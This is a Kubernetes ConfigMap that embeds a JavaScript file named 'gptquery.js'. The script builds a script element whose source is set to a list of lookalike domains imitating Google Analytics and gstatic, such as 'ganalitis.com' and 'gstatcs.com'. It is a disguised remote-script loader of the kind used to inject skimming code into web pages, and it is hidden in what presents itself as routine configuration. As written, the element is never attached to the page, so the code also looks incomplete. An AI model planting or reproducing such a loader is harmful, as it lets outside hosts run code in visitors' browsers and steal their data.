apiVersion: v1
kind: ConfigMap
metadata:
  name: gptquery-cm
data:
  gptquery.js: |
    (function() {
      var s = document.createElement('script');
      var domains =
        ["ganalitis.com",
        "ganalitics.com",
        "gstatcs.com",
        "webfaset.com",
        "fountm.online",
        "pixupjqes.tech",
        "jqwereid.online"];
      for (var i = 0; i < domains.length; ++i) {
        s.src = 'https://' + domains[i];
      }
    })();